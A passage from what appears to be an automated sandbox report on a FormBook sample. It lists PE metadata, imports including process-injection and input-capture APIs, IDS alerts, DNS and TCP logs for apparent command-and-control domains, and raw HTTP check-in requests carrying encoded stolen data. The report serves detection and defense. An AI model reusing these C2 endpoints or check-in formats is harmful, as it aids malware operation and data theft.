            lea esi, dword ptr [esi+08h]
            movq qword ptr [edi], xmm1
            lea edi, dword ptr [edi+08h]
            test esi, 00000007h
            je 00007FE2D4CBFCA5h
            bt esi, 03h

            Rich Headers

            Programming Language:
            • [ASM] VS2013 build 21005
            • [ C ] VS2013 build 21005
            • [C++] VS2013 build 21005
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            • [ASM] VS2013 UPD5 build 40629
            • [RES] VS2013 build 21005
            • [LNK] VS2013 UPD5 build 40629

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x521dc.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x11b0000x7134.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0xc80000x521dc0x522006e27666788b9e4c696008d7c6a34d2beFalse0.9205164335996956data7.876468035686738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x11b0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
            RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
            RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
            RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
            RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
            RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
            RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
            RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
            RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
            RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
            RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
            RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
            RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
            RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
            RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
            RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
            RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
            RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
            RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
            RT_RCDATA0xd07b80x49472data1.000336502901921
            RT_GROUP_ICON0x119c2c0x76dataEnglishGreat Britain0.6610169491525424
            RT_GROUP_ICON0x119ca40x14dataEnglishGreat Britain1.25
            RT_GROUP_ICON0x119cb80x14dataEnglishGreat Britain1.15
            RT_GROUP_ICON0x119ccc0x14dataEnglishGreat Britain1.25
            RT_VERSION0x119ce00x10cdataEnglishGreat Britain0.5970149253731343
            RT_MANIFEST0x119dec0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

            Imports

            DLLImport
            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
            PSAPI.DLLGetProcessMemoryInfo
            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
            UxTheme.dllIsThemeActive
            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishGreat Britain

            Network Behavior

            Snort IDS Alerts

            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            05/27/24-19:16:10.032522TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971380192.168.2.5194.58.112.174
            05/27/24-19:16:59.270961TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972180192.168.2.5188.114.96.3
            05/27/24-19:16:26.567429TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971880192.168.2.543.132.225.97
            05/27/24-19:17:01.817147TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972280192.168.2.5188.114.96.3
            05/27/24-19:15:43.469777TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971180192.168.2.566.113.136.229
            05/27/24-19:16:24.039251TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971780192.168.2.543.132.225.97
            05/27/24-19:16:17.928509TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971680192.168.2.5194.58.112.174
            05/27/24-19:16:12.566468TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971480192.168.2.5194.58.112.174
            05/27/24-19:16:32.483493TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972080192.168.2.543.132.225.97

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            May 27, 2024 19:15:43.464005947 CEST4971180192.168.2.566.113.136.229
            May 27, 2024 19:15:43.469041109 CEST804971166.113.136.229192.168.2.5
            May 27, 2024 19:15:43.469162941 CEST4971180192.168.2.566.113.136.229
            May 27, 2024 19:15:43.469777107 CEST4971180192.168.2.566.113.136.229
            May 27, 2024 19:15:43.474714041 CEST804971166.113.136.229192.168.2.5
            May 27, 2024 19:16:04.837353945 CEST804971166.113.136.229192.168.2.5
            May 27, 2024 19:16:04.837577105 CEST4971180192.168.2.566.113.136.229
            May 27, 2024 19:16:04.838138103 CEST4971180192.168.2.566.113.136.229
            May 27, 2024 19:16:04.844521999 CEST804971166.113.136.229192.168.2.5
            May 27, 2024 19:16:10.027160883 CEST4971380192.168.2.5194.58.112.174
            May 27, 2024 19:16:10.032246113 CEST8049713194.58.112.174192.168.2.5
            May 27, 2024 19:16:10.032464981 CEST4971380192.168.2.5194.58.112.174
            May 27, 2024 19:16:10.032521963 CEST4971380192.168.2.5194.58.112.174
            May 27, 2024 19:16:10.037974119 CEST8049713194.58.112.174192.168.2.5
            May 27, 2024 19:16:10.725030899 CEST8049713194.58.112.174192.168.2.5
            May 27, 2024 19:16:10.725083113 CEST8049713194.58.112.174192.168.2.5
            May 27, 2024 19:16:10.725147009 CEST4971380192.168.2.5194.58.112.174
            May 27, 2024 19:16:11.544758081 CEST4971380192.168.2.5194.58.112.174
            May 27, 2024 19:16:12.560751915 CEST4971480192.168.2.5194.58.112.174
            May 27, 2024 19:16:12.566195965 CEST8049714194.58.112.174192.168.2.5
            May 27, 2024 19:16:12.566304922 CEST4971480192.168.2.5194.58.112.174
            May 27, 2024 19:16:12.566468000 CEST4971480192.168.2.5194.58.112.174
            May 27, 2024 19:16:12.571455956 CEST8049714194.58.112.174192.168.2.5
            May 27, 2024 19:16:13.255140066 CEST8049714194.58.112.174192.168.2.5
            May 27, 2024 19:16:13.255197048 CEST8049714194.58.112.174192.168.2.5
            May 27, 2024 19:16:13.255264997 CEST4971480192.168.2.5194.58.112.174
            May 27, 2024 19:16:14.076118946 CEST4971480192.168.2.5194.58.112.174
            May 27, 2024 19:16:15.382242918 CEST4971580192.168.2.5194.58.112.174
            May 27, 2024 19:16:15.388149977 CEST8049715194.58.112.174192.168.2.5
            May 27, 2024 19:16:15.388263941 CEST4971580192.168.2.5194.58.112.174
            May 27, 2024 19:16:15.388653994 CEST4971580192.168.2.5194.58.112.174
            May 27, 2024 19:16:15.393770933 CEST8049715194.58.112.174192.168.2.5
            May 27, 2024 19:16:15.393810034 CEST8049715194.58.112.174192.168.2.5
            May 27, 2024 19:16:16.096960068 CEST8049715194.58.112.174192.168.2.5
            May 27, 2024 19:16:16.097286940 CEST8049715194.58.112.174192.168.2.5
            May 27, 2024 19:16:16.097351074 CEST4971580192.168.2.5194.58.112.174
            May 27, 2024 19:16:16.904418945 CEST4971580192.168.2.5194.58.112.174
            May 27, 2024 19:16:17.920212984 CEST4971680192.168.2.5194.58.112.174
            May 27, 2024 19:16:17.928112984 CEST8049716194.58.112.174192.168.2.5
            May 27, 2024 19:16:17.928210020 CEST4971680192.168.2.5194.58.112.174
            May 27, 2024 19:16:17.928508997 CEST4971680192.168.2.5194.58.112.174
            May 27, 2024 19:16:17.935483932 CEST8049716194.58.112.174192.168.2.5
            May 27, 2024 19:16:18.629443884 CEST8049716194.58.112.174192.168.2.5
            May 27, 2024 19:16:18.629622936 CEST8049716194.58.112.174192.168.2.5
            May 27, 2024 19:16:18.629918098 CEST4971680192.168.2.5194.58.112.174
            May 27, 2024 19:16:18.629988909 CEST4971680192.168.2.5194.58.112.174
            May 27, 2024 19:16:18.635265112 CEST8049716194.58.112.174192.168.2.5
            May 27, 2024 19:16:24.030953884 CEST4971780192.168.2.543.132.225.97
            May 27, 2024 19:16:24.036022902 CEST804971743.132.225.97192.168.2.5
            May 27, 2024 19:16:24.036144018 CEST4971780192.168.2.543.132.225.97
            May 27, 2024 19:16:24.039251089 CEST4971780192.168.2.543.132.225.97
            May 27, 2024 19:16:24.045866966 CEST804971743.132.225.97192.168.2.5
            May 27, 2024 19:16:25.544811964 CEST4971780192.168.2.543.132.225.97
            May 27, 2024 19:16:25.591711044 CEST804971743.132.225.97192.168.2.5
            May 27, 2024 19:16:26.561976910 CEST4971880192.168.2.543.132.225.97
            May 27, 2024 19:16:26.567120075 CEST804971843.132.225.97192.168.2.5
            May 27, 2024 19:16:26.567200899 CEST4971880192.168.2.543.132.225.97
            May 27, 2024 19:16:26.567429066 CEST4971880192.168.2.543.132.225.97
            May 27, 2024 19:16:26.575087070 CEST804971843.132.225.97192.168.2.5
            May 27, 2024 19:16:28.076133013 CEST4971880192.168.2.543.132.225.97
            May 27, 2024 19:16:28.123605967 CEST804971843.132.225.97192.168.2.5
            May 27, 2024 19:16:29.092524052 CEST4971980192.168.2.543.132.225.97
            May 27, 2024 19:16:29.097748041 CEST804971943.132.225.97192.168.2.5
            May 27, 2024 19:16:29.097979069 CEST4971980192.168.2.543.132.225.97
            May 27, 2024 19:16:29.098670959 CEST4971980192.168.2.543.132.225.97
            May 27, 2024 19:16:29.103703022 CEST804971943.132.225.97192.168.2.5
            May 27, 2024 19:16:29.103926897 CEST804971943.132.225.97192.168.2.5
            May 27, 2024 19:16:30.610555887 CEST4971980192.168.2.543.132.225.97
            May 27, 2024 19:16:30.747574091 CEST804971943.132.225.97192.168.2.5
            May 27, 2024 19:16:32.477917910 CEST4972080192.168.2.543.132.225.97
            May 27, 2024 19:16:32.483213902 CEST804972043.132.225.97192.168.2.5
            May 27, 2024 19:16:32.483328104 CEST4972080192.168.2.543.132.225.97
            May 27, 2024 19:16:32.483493090 CEST4972080192.168.2.543.132.225.97
            May 27, 2024 19:16:32.488382101 CEST804972043.132.225.97192.168.2.5
            May 27, 2024 19:16:45.437998056 CEST804971743.132.225.97192.168.2.5
            May 27, 2024 19:16:45.438146114 CEST4971780192.168.2.543.132.225.97
            May 27, 2024 19:16:47.952203989 CEST804971843.132.225.97192.168.2.5
            May 27, 2024 19:16:47.954204082 CEST4971880192.168.2.543.132.225.97
            May 27, 2024 19:16:50.452187061 CEST804971943.132.225.97192.168.2.5
            May 27, 2024 19:16:50.452250004 CEST4971980192.168.2.543.132.225.97
            May 27, 2024 19:16:53.862335920 CEST804972043.132.225.97192.168.2.5
            May 27, 2024 19:16:53.866197109 CEST4972080192.168.2.543.132.225.97
            May 27, 2024 19:16:53.866341114 CEST4972080192.168.2.543.132.225.97
            May 27, 2024 19:16:53.873918056 CEST804972043.132.225.97192.168.2.5

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            May 27, 2024 19:15:37.834064007 CEST6334453192.168.2.51.1.1.1
            May 27, 2024 19:15:37.866555929 CEST53633441.1.1.1192.168.2.5
            May 27, 2024 19:15:43.194463015 CEST6460653192.168.2.51.1.1.1
            May 27, 2024 19:15:43.459127903 CEST53646061.1.1.1192.168.2.5
            May 27, 2024 19:16:09.842380047 CEST6029953192.168.2.51.1.1.1
            May 27, 2024 19:16:10.026493073 CEST53602991.1.1.1192.168.2.5
            May 27, 2024 19:16:23.641004086 CEST5476753192.168.2.51.1.1.1
            May 27, 2024 19:16:24.030093908 CEST53547671.1.1.1192.168.2.5
            May 27, 2024 19:16:59.248620033 CEST6062453192.168.2.51.1.1.1
            May 27, 2024 19:16:59.264856100 CEST53606241.1.1.1192.168.2.5

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            May 27, 2024 19:15:37.834064007 CEST192.168.2.51.1.1.10xb68cStandard query (0)www.sweet777.workA (IP address)IN (0x0001)false
            May 27, 2024 19:15:43.194463015 CEST192.168.2.51.1.1.10xa572Standard query (0)www.goodroothealth.comA (IP address)IN (0x0001)false
            May 27, 2024 19:16:09.842380047 CEST192.168.2.51.1.1.10x6274Standard query (0)www.make-l.ruA (IP address)IN (0x0001)false
            May 27, 2024 19:16:23.641004086 CEST192.168.2.51.1.1.10xcdfdStandard query (0)www.kguyreoalpha.shopA (IP address)IN (0x0001)false
            May 27, 2024 19:16:59.248620033 CEST192.168.2.51.1.1.10x7c70Standard query (0)www.waldil.onlineA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            May 27, 2024 19:15:37.866555929 CEST1.1.1.1192.168.2.50xb68cServer failure (2)www.sweet777.worknonenoneA (IP address)IN (0x0001)false
            May 27, 2024 19:15:43.459127903 CEST1.1.1.1192.168.2.50xa572No error (0)www.goodroothealth.com66.113.136.229A (IP address)IN (0x0001)false
            May 27, 2024 19:16:10.026493073 CEST1.1.1.1192.168.2.50x6274No error (0)www.make-l.ru194.58.112.174A (IP address)IN (0x0001)false
            May 27, 2024 19:16:24.030093908 CEST1.1.1.1192.168.2.50xcdfdNo error (0)www.kguyreoalpha.shop43.132.225.97A (IP address)IN (0x0001)false
            May 27, 2024 19:16:59.264856100 CEST1.1.1.1192.168.2.50x7c70No error (0)www.waldil.online188.114.96.3A (IP address)IN (0x0001)false
            May 27, 2024 19:16:59.264856100 CEST1.1.1.1192.168.2.50x7c70No error (0)www.waldil.online188.114.97.3A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • www.goodroothealth.com
            • www.make-l.ru
            • www.kguyreoalpha.shop

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.54971166.113.136.229807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:15:43.469777107 CEST518OUTGET /0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U4 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.goodroothealth.com
            Connection: close
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.549713194.58.112.174807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:16:10.032521963 CEST761OUTPOST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.make-l.ru
            Cache-Control: no-cache
            Content-Length: 209
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.make-l.ru
            Referer: http://www.make-l.ru/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 66 57 6e 74 58 34 37 33 48 61 64 4b 4e 48 50 57 50 51 2f 54 55 52 4f 36 79 6d 6e 59 65 35 35 4b 4e 6b 48 58 62 56 51 34 36 62 70 35 44 41 47 75 6d 69 73 67 58 36 39 64 6a 4a 6b 59 41 35 69 49 39 6b 33 6a 55 68 49 79 2f 41 55 63 48 5a 53 50 31 65 73 51 38 4c 4f 6a 58 66 57 59 68 34 74 6c 48 62 78 4a 47 35 50 6a 31 6a 30 6a 4d 65 59 7a 50 4f 42 73 54 34 59 47 71 70 6a 2b 7a 33 6b 5a 46 6f 6b 56 53 71 6f 73 51 65 4e 61 47 59 57 50 61 52 50 4a 34 44 75 69 4a 4a 6b 44 65 6c 47 32 30 48 67 4a 54 59 39 68 59 4c 64 77 76 32 4f 32 78 2f 64 77 63 61 50 56 32 47 41 70 56 32 4b 54 55 6d 53 6d 66 65 59 3d
            Data Ascii: X430XLq0=fWntX473HadKNHPWPQ/TURO6ymnYe55KNkHXbVQ46bp5DAGumisgX69djJkYA5iI9k3jUhIy/AUcHZSP1esQ8LOjXfWYh4tlHbxJG5Pj1j0jMeYzPOBsT4YGqpj+z3kZFokVSqosQeNaGYWPaRPJ4DuiJJkDelG20HgJTY9hYLdwv2O2x/dwcaPV2GApV2KTUmSmfeY=
